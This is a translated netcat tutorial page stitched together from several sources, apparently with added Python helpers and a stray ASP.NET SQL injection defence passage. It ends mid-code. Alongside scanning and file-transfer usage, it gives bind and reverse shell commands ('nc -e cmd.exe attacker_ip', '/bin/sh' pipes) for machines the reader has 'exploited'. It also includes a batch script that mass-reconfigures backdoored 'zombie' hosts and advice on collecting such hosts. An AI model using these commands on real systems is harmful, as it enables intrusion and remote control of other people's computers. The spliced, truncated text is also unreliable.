2025-01-17 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/02 Report--
nc's full name is Netcat (the "network knife"); its authors are Hobbit && Chris Wysopal. It is famous for being both powerful and tiny, and is also known as the "Swiss Army knife": nc - TCP/IP swiss army knife.
nc is often used for exploitation (overflows), reverse connections, uploading text, and so on. It is really a non-standard telnet client program, and it can also stand in for a putty.exe-style client.
Socat is a replacement for nc that could be called nc++: an N-times enhanced netcat. Socat supports many connection types, such as ip, tcp, udp, ipv6, pipe, exec, system, open proxy, openssl, etc.
Function description: powerful network tool
Syntax: nc [-hlnruz] [-g gateway] [-G num] [-i secs] [-o file] [-p port] [-s addr] [-v] [-w secs] [hostname] [port]
Parameters:
-g  set source-routing hop gateways, up to 8.
-G  set the source-routing pointer; its value is a multiple of 4.
-h  online help.
-i  set the delay interval between lines sent and between ports scanned.
-l  listen mode, for inbound connections (listen on a local port).
-n  use IP addresses directly, without going through DNS.
-o  specify a file name and dump the data transferred in both directions into it in hexadecimal.
-p  set the local port the local host uses.
-r  randomize the local and remote ports.
-s  set the source IP address of packets sent by the local host.
-u  use the UDP transport protocol.
-v  show the command's execution process (verbose).
-w  set the connection timeout.
-z  zero-I/O mode, used only when scanning ports.
[root@hatest1 ~]# type -a nc
nc is /usr/bin/nc
[root@hatest1 ~]# rpm -q nc
nc-1.10-22
1) Port scan
nc -v -z host.example.com 70-80    # scan ports 70 to 80; a range can be given. -v prints details
nc -v -w 1 192.168.228.222 -z 1-1000
root@~# nc -v -w 2 192.168.2.34 -z 21-24    # you can also try the effect without the -z parameter
nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
Connection to 192.168.2.34 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused
root@10.1.1.43:~# nc -v -z -w2 127.0.0.1 1-100
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 80
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 -z 80-3000
# listen on a local port
root@10.1.1.43:~# nc -l -p 1234
root@10.1.1.43:~# netstat -tunlp | grep 1234
tcp        0      0 0.0.0.0:1234            0.0.0.0:*               LISTEN      15543/nc
# test a UDP port
root@172.16.211.34:web# netstat -tunlp
Active Internet connections (only servers)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1111/sshd
udp        0      0 0.0.0.0:68              0.0.0.0:*                           887/dhclient
root@172.16.211.35:~# nc -vuz 172.16.211.34 68
Connection to 172.16.211.34 68 port [udp/bootpc] succeeded!
nc -p 1234 -w 5 host.example.com 80
Establish a connection from local port 1234 to port 80 on host.example.com, with a 5 second timeout.
nc -u host.example.com 53
-u makes it a UDP connection.
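Added example (not from the page): a Python parser for the nc -v -z output shown above, which turns a sweep into an open-port inventory for an exposure check; the sample lines are constructed to match the session's wording. It also reports a UDP "succeeded" as open|filtered, because without an ICMP port-unreachable reply nc cannot tell open from filtered.

```python
import re
from collections import defaultdict

# Constructed sample mirroring the wording nc prints in the session above
# (one TCP range sweep plus one UDP probe); not captured from a live host.
SAMPLE_SCAN_OUTPUT = """\
nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
Connection to 192.168.2.34 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused
Connection to 172.16.211.34 68 port [udp/bootpc] succeeded!
"""

# "Connection to HOST PORT port [PROTO/SERVICE] succeeded!"  -> reachable
OPEN_RE = re.compile(
    r"^Connection to (?P<host>\S+) (?P<port>\d+) port "
    r"\[(?P<proto>tcp|udp)/(?P<service>[^\]]*)\] succeeded!")
# "nc: connect to HOST port PORT (PROTO) failed: REASON"      -> not reachable
FAIL_RE = re.compile(
    r"^nc: connect to (?P<host>\S+) port (?P<port>\d+) "
    r"\((?P<proto>tcp|udp)\) failed: (?P<reason>.+)$")


def parse_scan(output):
    """Map (host, proto) -> {port: (state, detail)} from nc -v -z output.

    A UDP "succeeded" only means nothing came back before the timeout, so it
    is reported as open|filtered rather than open.
    """
    results = defaultdict(dict)
    for line in output.splitlines():
        line = line.strip()
        m = OPEN_RE.match(line)
        if m:
            state = "open" if m["proto"] == "tcp" else "open|filtered"
            results[(m["host"], m["proto"])][int(m["port"])] = (state, m["service"])
            continue
        m = FAIL_RE.match(line)
        if m:
            results[(m["host"], m["proto"])][int(m["port"])] = ("closed", m["reason"])
    return dict(results)


def open_ports(output):
    """Sorted (host, proto, port, service) tuples for every reachable port."""
    found = []
    for (host, proto), ports in parse_scan(output).items():
        for port, (state, detail) in ports.items():
            if state != "closed":
                found.append((host, proto, port, detail))
    return sorted(found)


if __name__ == "__main__":
    for host, proto, port, service in open_ports(SAMPLE_SCAN_OUTPUT):
        print(f"{host}:{port}/{proto}  ({service})")
```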
2) copy files remotely
Copy files from server1 to server2.
First on server2, activate listening with nc, and run on server2:
[root@hatest2 tmp]# nc -lp 1234 > install.log
Run on server1:
[root@hatest1]# ll install.log
-rw-r--r-- 1 root root 39693 December 20 2007 install.log
[root@hatest1]# nc -w 1 192.168.228.222 1234 < install.log
In general, the destination host listens with nc -l <listen port> > <file name to receive>, for example: nc -l 4444 > cache.tar.gz
The source host initiates the request with nc <destination host ip> <destination port>, for example: nc 192.168.0.85 4444
netstat shows:
[root@localhost jiangbao]# netstat -tpln
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      18166/nc
Directory transfer
Copy the contents of the nginx-0.6.34 directory from server1 to server2.
First on server2, activate listening with nc, and run on server2:
[root@hatest2 tmp]# nc -l 1234 | tar xzvf -
Run on server1:
[root@hatest1 ~]# ll -d nginx-0.6.34
drwxr-xr-x 8 1000 1000 4096 12-23 17:25 nginx-0.6.34
[root@hatest1 ~]# tar czvf - nginx-0.6.34 | nc 192.168.228.222 1234
Copy files from 192.168.2.33 to 192.168.2.34
On 192.168.2.34: nc -l 1234 > test.txt
On 192.168.2.33: nc 192.168.2.34 1234 < test.txt
Clone a hard disk or partition
The operation is the same as the copy above: obtain the disk or partition data with dd, then transfer it. Cloning a disk or partition should not be done on a system that is already mounted, so boot from the installation CD into rescue mode (or boot a Knoppix tool CD), then on server2 perform a similar listen:
# nc -l -p 1234 | dd of=/dev/sda
Run the transfer on server1, which completes cloning the sda disk from server1 to server2:
# dd if=/dev/sda | nc 192.168.228.222 1234
3) Simple chat tool
On 192.168.2.34: nc -l 1234
On 192.168.2.33: nc 192.168.2.34 1234
Now the two sides can talk to each other. Use Ctrl+C (or Ctrl+D) to exit.
nc -l 1234 and nc 127.0.0.1 1234 establish a connection on port 1234 and send each side's input to the other.
4) Serve a saved web page
# while true; do nc -l -p 80 -q 1 < somepage.html; done
5) Simulate HTTP headers
[root@hatest1 ~]# nc www.linuxfly.org 80
GET / HTTP/1.1
Host: ispconfig.org
Referrer: mypage.com
User-Agent: my-browser

HTTP/1.1 200 OK
Date: Tue, 16 Dec 2008 07:23:24 GMT
Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8
Set-Cookie: PHPSESSID=bbadorbvie1gn037iih7lrdg50; path=/
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Set-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html
[......]
After the nc command, type the request lines (GET through User-Agent, shown in red in the original), then press Enter twice, and the HTTP headers come back from the other side.
echo -ne "GET / HTTP/1.0\r\n\r\n" | nc host.example.com 80    # connect to the host and send the request
6) Operating memcached with nc
1) store data: printf "set key 0 10 6\r\nresult\r\n" | nc 192.168.2.34 11211
2) get data: printf "get key\r\n" | nc 192.168.2.34 11211
3) delete data: printf "delete key\r\n" | nc 192.168.2.34 11211
4) view status: printf "stats\r\n" | nc 192.168.2.34 11211
5) simulate top to watch the status: watch "echo stats" | nc 192.168.2.34 11211
6) flush the cache: printf "flush_all\r\n" | nc 192.168.2.34 11211 (be careful: once flushed, the cache is gone)
Supplementary tutorial 2: how to use nc
netcat is known as the 'Swiss Army knife' of network security; surely everyone knows it by now......
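Added example (not from the page): Python framing and parsing for the memcached text protocol that the printf ... | nc lines above drive by hand, so the length-prefixed set/get messages can be built without counting bytes manually. The reply bytes are constructed to follow the protocol, not captured from a server; send_command assumes a reachable memcached.

```python
import socket

# Replies memcached terminates a text-protocol response with (used to know when to stop reading).
TERMINATORS = (b"END\r\n", b"STORED\r\n", b"NOT_STORED\r\n", b"DELETED\r\n",
               b"NOT_FOUND\r\n", b"OK\r\n", b"ERROR\r\n")


def build_set(key, value, flags=0, exptime=0):
    """Frame 'set <key> <flags> <exptime> <bytes>\\r\\n<data>\\r\\n'.

    The byte count, not a delimiter, bounds the data block, which is why the
    hand-typed printf above must state exactly len(value): 6 for "result".
    """
    if isinstance(value, str):
        value = value.encode()
    if len(key) > 250 or any(c.isspace() for c in key):
        raise ValueError("memcached keys are at most 250 bytes with no whitespace")
    header = f"set {key} {flags} {exptime} {len(value)}\r\n".encode()
    return header + value + b"\r\n"


def build_get(key):
    return f"get {key}\r\n".encode()


def parse_get_response(data):
    """Parse 'VALUE <key> <flags> <bytes>\\r\\n<data>\\r\\n ... END\\r\\n' into {key: (flags, data)}."""
    items, pos = {}, 0
    while True:
        end = data.index(b"\r\n", pos)        # raises ValueError on a truncated reply
        line, pos = data[pos:end], end + 2
        if line == b"END":
            return items
        parts = line.split()
        if len(parts) < 4 or parts[0] != b"VALUE":
            raise ValueError(f"unexpected reply line: {line!r}")
        key, flags, nbytes = parts[1].decode(), int(parts[2]), int(parts[3])
        value = data[pos:pos + nbytes]        # length-prefixed, so the value may itself contain \r\n
        if data[pos + nbytes:pos + nbytes + 2] != b"\r\n":
            raise ValueError("data block does not match the declared byte count")
        items[key] = (flags, value)
        pos += nbytes + 2


def send_command(host, port, payload, timeout=3.0):
    """Send one framed command and return the raw reply.

    The text protocol has no authentication: anyone who can reach 11211 can
    run flush_all, so keep the port bound to trusted interfaces only.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(payload)
        buf = b""
        while not buf.endswith(TERMINATORS):
            chunk = sock.recv(4096)
            if not chunk:
                break
            buf += chunk
    return buf


if __name__ == "__main__":
    # e.g. send_command("192.168.2.34", 11211, build_set("key", "result", 0, 10))
    print(build_set("key", "result", 0, 10))
    print(parse_get_response(b"VALUE key 0 6\r\nresult\r\nEND\r\n"))
```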
A simple and useful tool that reads and writes data across network connections using the TCP or UDP protocol. It is designed as a reliable back-end tool that can be driven easily by other programs and scripts. At the same time it is a powerful network debugging and exploration tool, able to create almost any kind of network connection you need, with several interesting built-in features (see the usage below for details).
In China its Windows build exists in two versions: the original written by Chris Wysopal, and a new 'condensed' build compiled by 'Red and Black'. The condensed main program is only a little over 10 KB (the 10-odd KB nc cannot perform usages 4 and 5 below; the original with that feature seems to be about 60 KB :P); small as it is, it does a lot of work.
Software introduction:
Tool name: Netcat
Authors: Hobbit && Chris Wysopal
URL: http://www.atstake.com/research/tools/network_utilities/
Category: open source
Platform: Linux/BSD/Unix/Windows
Windows version: [v1.10 NT]
Parameters: nc.exe -h shows how each parameter is used.
Basic format: nc [-options] hostname port[s] [ports] ...
              nc -l -p port [options] [hostname] [port]
-d  background (detach) mode
-e  program redirection: once connected, execute the program [dangerous!!]
-g gateway  source-routing hop point[s], up to 8 (set source-routing gateways, up to 8)
-G num  source-routing pointer: 4, 8, 12, ... (the source-routing pointer, a multiple of 4)
-h  help
-i secs  delay interval
-l  listen mode, for inbound connections (listen on a local port)
-L  keep listening after the connection closes
-n  numeric IP addresses only, no hostnames, i.e. use the IP directly without going through DNS
-o file  specify a file name and dump the data transferred in both directions into it in hexadecimal
-p port  local port number (specify the local port)
-r  randomize local and remote ports
-s addr  local source address
-t  answer TELNET negotiation (respond with telnet)
-u  UDP mode
-v  verbose output; use two (-vv) for more detail. Obtain port information
-w secs  timeout
-z  turn input/output off; used only for scanning
Ports can be written as a range in the form M-N.
Basic usage, roughly these cases:
1) Connect to a remote host, for example:
Format: nc -nvv 192.168.x.x 80
Explanation: connect to TCP port 80 of 192.168.x.x
2) Listen on the local host, for example:
Format: nc -l -p 80
Explanation: listen on local TCP port 80
3) Scan a remote host, for example:
Format: nc -nvv -w2 -z 192.168.x.x 80-445
Explanation: scan all ports from TCP 80 to TCP 445 on 192.168.x.x
4) Bind a shell on the remote host, for example:
Format: nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
Explanation: bind the remote host's CMD shell to TCP port 5354 of the remote host
5) Bind a shell on the remote host and connect back, for example:
Format: nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
Explanation: bind the remote host's CMD shell and connect back to TCP port 5354 of 192.168.x.x
These are the most basic usages (nc has many more, and becomes far more powerful combined with the pipe "|" and redirection "<" ">" commands......).
Advanced usage:
6) Used as an attack program, for example:
Format 1: type.exe c:\exploit.txt | nc -nvv 192.168.x.x 80
Format 2: nc -nvv 192.168.x.x 80 < c:\exploit.txt
Explanation: connect to port 80 of 192.168.x.x and send the contents of c:\exploit.txt through the pipe (the two formats really do have the same effect :P)
Note: c:\exploit.txt holds shellcode etc.
7) Used as a honeypot [1], for example:
Format: nc -L -p 80
Explanation: use -L (note the capital L) to keep listening on a port until ctrl+c.
8) Used as a honeypot [2], for example:
Format: nc -L -p 80 > C:\log.txt
Explanation: use -L to keep listening on a port until ctrl+c, and write the results to c:\log.txt. If you change '>' to '>>', the log is appended to.
Note: c:\log.txt is the log file, etc.
9) Used as a honeypot [3], for example:
Format 1: nc -L -p 80 < c:\honeypot.txt
Format 2: type.exe c:\honeypot.txt | nc -L -p 80
Explanation: use -L to keep listening on a port until ctrl+c, and 'feed' the contents of c:\honeypot.txt into the pipe.

If an attacker knows that the application uses the content entered in a form directly in the query that verifies identity, he will try to enter special SQL strings that tamper with the query, change its original function, and trick the system into granting access. The damage an attacker can cause varies with the environment; it is mainly determined by the privileges the application has on the database. If the account has administrator or other high-level privileges, the attacker may be able to perform any operation he wants on the database tables, including adding, deleting or updating data, and may even drop tables outright.
2. How to defend?
Fortunately, preventing an ASP.NET application from being broken into by SQL injection is not particularly difficult: filter all input before using the form contents to build SQL commands. Input can be filtered in several ways.
(1) Where SQL queries are built dynamically, the following techniques can be used:
First: replace single quotes, i.e. change every lone single quote into two single quotes, so the attacker cannot change the meaning of the SQL command. Looking at the earlier example again, "Select * from Users Where login = ''' or ''1''=''1' AND password = ''' or ''1''=''1'" obviously gives a different result from "Select * from Users Where login = '' or '1'='1' AND password = '' or '1'='1'".
Second: remove all hyphens from user input, so the attacker cannot construct a query like "Select * from Users Where login = 'mas' -- AND password = ''", where the second half of the query has been commented out and no longer takes effect; the attacker only needs to know one valid login name and can gain access without knowing the password at all.
Third: restrict the privileges of the database account used to run queries. Use different accounts for select, insert, update and delete operations. Because the operations each account can perform are isolated, a place meant to run a Select cannot be turned into a place that runs Insert, Update or Delete.
(2) Use stored procedures for all queries. The way SQL parameters are passed prevents attackers from exploiting single quotes and hyphens. It also allows database permissions to be restricted to executing specific stored procedures only, and all user input must conform to the security context of the called stored procedure, so injection becomes very hard.
(3) Limit the length of form or query-string input. If a login name is at most 10 characters, do not accept more than 10 characters from the form; this greatly increases the difficulty of inserting harmful code into the SQL command.
(4) Check the validity of user input and make sure it contains only legitimate data. Checks should run on both the client and the server; the server-side validation exists to make up for the weak security of client-side validation. On the client, the attacker can obtain the page source, modify the validation script (or simply delete it), and submit illegal content through the modified form. So the only way to be sure validation really ran is to perform it on the server too. You can use many built-in validation objects, such as RegularExpressionValidator, which generate the client-side validation script automatically, and you can of course also insert server-side method calls. If no ready-made validator fits, create one with CustomValidator.
(5) Store user login names, passwords and similar data in encrypted form. Encrypting the user's input before comparing it with what is stored in the database amounts to "disinfecting" the input: it no longer has any special meaning to the database, which prevents the attacker from injecting SQL commands. The System.Web.Security.FormsAuthentication class has a HashPasswordForStoringInConfigFile method that is well suited to sanitizing input this way.
(6) Check the number of records returned by a query that retrieves data. If the program expects one record but more than one row comes back, treat it as an error.

nc -l -v -p 7626: open local port 7626 for listening and report connection information. Anyone scanning for the Glacier (冰河) Trojan will think you are infected, with 7626 open; this is a bit like the function of "Little Pig Run" (小猪快跑), and combined with a batch file it becomes a "Little Pig Run".
nc -l -p 80 >> c:\log.dat
If you want to monitor whether local port 80 is being probed, note this command down and use it; everything sent to local port 80 is then recorded.
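The defence steps from the SQL injection passage above, as an added Python example (not from the page): a dynamic query built by string concatenation beside the quote-doubling fix from step (1) and a parameterised query, run against a constructed in-memory SQLite table with two users, plus the row-count check from step (6). The table, accounts and inputs are all constructed here.

```python
import sqlite3


def make_db():
    """In-memory Users table with two constructed accounts (sample data, not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (login TEXT, password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("mas", "secret"), ("bob", "hunter2")])
    return conn


def login_concat(conn, login, password):
    """Dynamic SQL spliced from user input: the pattern the passage warns about."""
    sql = (f"SELECT * FROM Users WHERE login = '{login}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_quote_doubling(conn, login, password):
    """Step (1), 'first': every single quote becomes two, so input stays inside the literal.

    This only protects quoted string literals; a number spliced unquoted into
    SQL is still injectable, which is why parameters are the stronger fix.
    """
    def esc(s):
        return s.replace("'", "''")
    sql = (f"SELECT * FROM Users WHERE login = '{esc(login)}' "
           f"AND password = '{esc(password)}'")
    return conn.execute(sql).fetchall()


def login_param(conn, login, password):
    """Parameterised query: values are bound, never parsed as SQL text."""
    return conn.execute(
        "SELECT * FROM Users WHERE login = ? AND password = ?",
        (login, password)).fetchall()


def authenticate(rows):
    """Step (6): exactly one matching record, otherwise treat it as an error."""
    return len(rows) == 1


if __name__ == "__main__":
    db = make_db()
    probe = "' or '1'='1"
    print("concat      :", login_concat(db, probe, probe))
    print("quote-double:", login_quote_doubling(db, probe, probe))
    print("parameters  :", login_param(db, probe, probe))
    print("comment trick through concat:", login_concat(db, "mas' --", "wrong"))
```

Note that the comment trick ("mas' --") returns exactly one row through the concatenated query, so the row-count check alone does not catch it; it is the quoting or parameterisation that stops it.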
nc -l -p 123 -e cmd.exe   or   nc -l -p 123 -t
If you have exploited (overflowed) someone else's machine, run the command above there: it makes cmd.exe answer connections to port 123 on that machine.
This turns the exploited host into a telnet zombie (a compromised host; "broiler" in the original). You can also use the command to make the zombie connect to your host actively; assume my IP is 192.168.0.1.
Run on the zombie: nc -e cmd.exe 192.168.0.1 777. Then run on your own machine: nc -l -p 777.
This tells the zombie to hand cmd.exe (that is, a shell) to port 777 of your computer; once you listen on port 777 locally, you are inside the other side's cmd.
This is also the principle behind a simple bounce-port (reverse-connect) Trojan.
nc -v 192.168.0.25 80
Get information about port 80 of 192.168.0.25; you can learn a lot of important details such as the IIS version.
nc -v -z 192.168.0.25 1-100
Scan TCP ports 1 to 100 of 192.168.0.25.
nc -v -z -u 192.168.0.25 1-100
This scans UDP ports 1 to 100.
nc -vv ip port    // port probing: RIVER [192.168.0.198] 19190 (?) open    // shows whether the port is open
Scanner
nc -vv -w 5 ip port-port port
nc -vv -z ip port-port port
This kind of scan leaves a lot of traces, and the system administrator will be extra careful.
Backdoor
victim machine:    // the victim's machine
nc -l -p port -e cmd.exe    // win2000
nc -l -p port -e /bin/sh    // unix, linux
attacker machine:    // the attacker's machine
nc ip -p port    // connects to victim_IP and gets a shell
Reverse connection
attacker machine:    // usually after an sql2.exe, remote overflow or webdavx3.exe attack, or the reverse connection of wollf
nc -vv -l -p port
victim machine:
nc -e cmd.exe attacker_ip -p port
nc -e /bin/sh attacker_ip -p port
Or:
attacker machine:
nc -vv -l -p port1
nc -vv -l -p port2
victim machine:
nc attacker_ip port1 | cmd.exe | nc attacker_ip port2
nc attacker_ip port1 | /bin/sh | nc attacker_ip port2
The -s parameter should be added (nc.exe -L -p 139 -d -e cmd.exe -s addr) to ensure that nc.exe takes the port ahead of NETBIOS.
Transfer files:
attacker machine: ... > path\file.txt    // needs Ctrl+C to exit
// the zombie must run this in the cmd.exe of the GUI session (terminal login is not as convenient as installing FTP); otherwise there is no way to enter Ctrl+C.
attacker machine -> victim machine    // upload a command file to the zombie
nc -vv -l -p port > path\file.txt    // needs Ctrl+C to exit
nc -d victim_ip port < path\filedest    // can be run from a shell
// This is better: we log in to the terminal, compromise other zombies, and can choose shell-mode login.
Capturing port data:
nc -vv -w 2 -o test.txt xfocus.Net 80 21-15
< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error
< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr
< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a             # ecognized...
< 00000084 83 00 00 01 8f                                  # .....
telnet, automated batch processing:
nc victim_ip port < path\file.cmd
nc -vv victim_ip port < path\file.cmd    // shows the execution process
nc -d victim_ip port < path\file.cmd    // quiet mode
_______________file.cmd________________________
password
cd %windir%
echo []=[%windir%]
c:
cd \
md test
cd /d %windir%\system32\
net stop sksockserver
snake.exe -config port 11111
net start sksockserver
exit
_______________file.cmd__END___________________
########################################
Managing zombies, changing zombie settings
########################################
1) For example, to change the proxy port on all zombies at once: snake.exe is changed to 11111, the service name is "sksockserver", using the winshell backdoor on port 1234 with password "password". The command format is: modi.bat youip.txt
___________modi.bat____________________________
@if "%1"=="" echo Error: no ip.txt &&goto END
:start
@echo password >a.cmd
@echo s >>a.cmd
@echo cd /d %windir%\system32\ >>a.cmd
@echo net stop "sksockserver" >>a.cmd
@echo snake.exe -config port 11111 >>a.cmd
@echo net start "sksockserver" >>a.cmd
@echo exit >>a.cmd
:auto
@for /f "eol=; tokens=1,2" %%i in (%1) do @(nc.exe -vv -w 3 %%i 1234 < a.cmd)
:END
___________modi.bat__END_______________________
2)
@echo off
color f0
:start
cls
C:\nc -vv -w 3 -l -p 80 >> 80.txt
goto start
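Added example (not from the page): a Python parser for the nc -o hex-dump format shown in the capture above, rebuilding the sent and received byte streams and flagging offset gaps that indicate a truncated or edited dump. The '<' lines reproduce the dump above; the '>' line is constructed to show the sending direction.

```python
import re

# Constructed sample in the format nc -o writes ("<" = received, ">" = sent).
# The "<" lines are the dump shown above; the ">" line is made up here.
SAMPLE_DUMP = """\
> 00000000 48 45 4c 4f 0d 0a                               # HELO..
< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error
< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr
< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a             # ecognized...
< 00000084 83 00 00 01 8f                                  # .....
"""

# direction, 8-hex-digit stream offset, 1..16 hex byte pairs, optional "# ascii" column
LINE_RE = re.compile(
    r"^(?P<dir>[<>]) (?P<off>[0-9a-fA-F]{8}) "
    r"(?P<hex>[0-9a-fA-F]{2}(?: [0-9a-fA-F]{2})*)\s*(?:#.*)?$")


def parse_dump(text):
    """Rebuild the '>' (sent) and '<' (received) byte streams from nc -o output.

    Returns (streams, gaps): streams maps direction -> bytes; gaps lists
    (direction, expected_offset, actual_offset) wherever consecutive lines of
    one direction are not contiguous. The first line of each direction may
    start at any offset, since a dump excerpt often omits earlier lines.
    """
    streams = {">": bytearray(), "<": bytearray()}
    next_off = {}
    gaps = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: not an nc -o dump line: {line!r}")
        direction, offset = m["dir"], int(m["off"], 16)
        chunk = bytes.fromhex(m["hex"])       # fromhex ignores the separating spaces
        if direction in next_off and next_off[direction] != offset:
            gaps.append((direction, next_off[direction], offset))
        streams[direction] += chunk
        next_off[direction] = offset + len(chunk)
    return {d: bytes(b) for d, b in streams.items()}, gaps


def received_text(text):
    """The received stream decoded as Latin-1 (one char per byte, so nothing is lost)."""
    streams, _ = parse_dump(text)
    return streams["<"].decode("latin-1")


if __name__ == "__main__":
    streams, gaps = parse_dump(SAMPLE_DUMP)
    print("sent    :", streams[">"])
    print("received:", streams["<"])
    print("gaps    :", gaps)
```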
Run this batch with the firewall turned off; the listener will receive a flood of messages probing for the Unicode vulnerability, mostly in groups of three: that is the Nimda virus scanning you.
This way you collect zombies. Their quality is not high, but it is a cheap method.
Characteristics of these zombies:
1. Unicode vulnerability
2. Empty Guest password, with the account in the Administrators group
3. Other holes
Used to transfer files: ncp
#! /bin/sh
## like rcp, but done with netcat on a high port
## do "ncp targetfile" on the machine that receives the file
## do "ncp sourcefile receivinghost" on the machine that sends the file
## if called as "nzp", the file is compressed in transit

## define the port you want to use here; choose freely
MYPORT=23456

## if nc is not in the system path, uncomment the following line and edit it
# PATH=${HOME}:${PATH} ; export PATH

## check the arguments
test "$3" && echo "too many args" && exit 1
test ! "$1" && echo "no args?" && exit 1
me=`echo $0 | sed 's+.*/++'`
test "$me" = "nzp" && echo '[compressed mode]'

# if there is a second arg, it is a host to send an [existing] file to
if test "$2" ; then
  test ! -f "$1" && echo "cant find $1" && exit 1
  if test "$me" = "nzp" ; then
    compress -c < "$1" | nc -v -w 2 $2 $MYPORT && exit 0
  else
    nc -v -w 2 $2 $MYPORT < "$1" && exit 0
  fi
  echo "transfer FAILED!"
  exit 1
fi

# receiving side: is there already a file of the same name in the current directory?
if test -f "$1" ; then
  echo -n "Overwrite $1? "
  read aa
  test ! "$aa" = "y" && echo "[punted!]" && exit 1
fi
# 30 seconds oughta be pleeeeenty of time, but change if you want.
if test "$me" = "nzp" ; then
  # note how nc is used here, combining redirection and a pipe
  nc -v -w 30 -p $MYPORT -l < /dev/null | uncompress -c > "$1" && exit 0
else
  nc -v -w 30 -p $MYPORT -l < /dev/null > "$1" && exit 0
fi
echo "transfer FAILED!"
# clean up, since even if the transfer failed, $1 is already trashed
rm -f "$1"
exit 1
With that, all I have to do on machine A is:
quackA# ncp ../abcd
It reports that it is listening; then on another machine B:
quackB# ncp abcd 192.168.0.2
quackb [192.168.0.1] 23456 (?) open
On machine A this appears:
connect to [192.168.0.2] from quackb [192.168.0.1] 1027
# then check that the file transferred completely.
=
[run locally] nc -v ip port
[command explanation] Scan a single port of an IP and return detailed output.
=
[local operation] nc -v -z ip port-port
[command explanation] Scan a range of ports of an IP and return detailed output, but the scan is slow.
=
[local operation] nc -v -z -u ip port-port
[command explanation] Scan a range of UDP ports of an IP and return detailed output, but the scan is slow.
=
[local operation] nc -l -p 80
[command explanation] Open local TCP port 80 and listen.
=
[local operation] nc -l -v -p 80
[command explanation] Open local TCP port 80 and print what is received in the current CMD window.
=
[run locally] nc -l -p 80 > E:/log.dat
[command explanation] Open local TCP port 80 and write what is received to the log file E:/log.dat.
=
[local operation] nc -nvv 192.168.1.101 80
[command explanation] Connect to port 80 of host 192.168.1.101.
=
[local operation] nc -nvv -w2 -z 192.168.1.101 80-1024
[command explanation] Scan ports 80-1024 of 192.168.1.101 with a connection timeout of 2 seconds.
=
[remote operation] nc -l -p 2012 -t -e cmd.exe
[local operation] nc -nvv 192.168.1.101 2012
[command explanation] Forward connection: run nc -l -p 2012 -t -e cmd.exe on the remote host (note: assume its IP address is 192.168.1.101), which binds the remote host's CMD to port 2012; when the local host connects successfully, a CMD shell is returned to it. Then run nc -nvv 192.168.1.101 2012 on the local host to connect to the remote host whose CMD has been redirected to port 2012.
=
[local operation] nc -l -p 2012
[remote operation] nc -t -e cmd.exe 192.168.1.102 2012
[command explanation] Reverse connection: first run nc -l -p 2012 on the local host (note: assume its IP address is 192.168.1.102) to open local port 2012 and wait for the remote host to connect; then run nc -t -e cmd.exe 192.168.1.102 2012 on the remote host to redirect its CMD to port 2012 of the host at 192.168.1.102, which gets a CMD shell once the connection succeeds.
=
[local operation] nc -v -n ip port < C:/sunzn.exe
[remote operation] nc -v -l -p port > D:/sunzn.exe
[command explanation] Running nc -v -n ip port < C:/sunzn.exe locally reads the contents of sunzn.exe from the root of the local C drive and sends the data to the corresponding port of the remote host (note: the IP on the command line is that of the remote host receiving the file); running nc -v -l -p port > D:/sunzn.exe on the remote host listens on that port and writes the received data to D:/sunzn.exe. Together the two commands transfer a file between the local and remote hosts.
=
[local operation] nc -L -p 8989 > e:\log.dat
nc -l -v -p port
Parameter explanation:
-l: listen on a port for inbound connections
-p: followed by the local port number
-v: displays information about the port; with -vv, more detailed information
Tip: generally everyone likes to use -vv.
nc -l -p 80    // very simple: listen on port 80. If this command is run on the machine, port 80 appears open and can fool a scanner
nc -l -p 80 > e:\log.dat    // write the details to the log file log.dat on drive E
nc -l -v -p 80    // similar to the command above, but displays the information directly on the screen where nc runs
Practice:
For example: nc -l -v -p 80
Then enter the local IP, 127.0.0.1, in the browser.
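Added example (not from the page): a Python triage of the raw request capture that nc -l -v -p 80 > log.dat (or the >> c:\log.dat honeypot earlier) accumulates, splitting the concatenated requests and flagging traversal-style probes of the kind the Unicode-vulnerability scans produce. The sample capture is constructed, not a real log.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample of what "nc -l -v -p 80 >> log.dat" accumulates: the raw
# bytes of successive client requests, concatenated. Not a real capture.
SAMPLE_LOG = (
    "GET / HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: Mozilla/4.0\r\n\r\n"
    "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"
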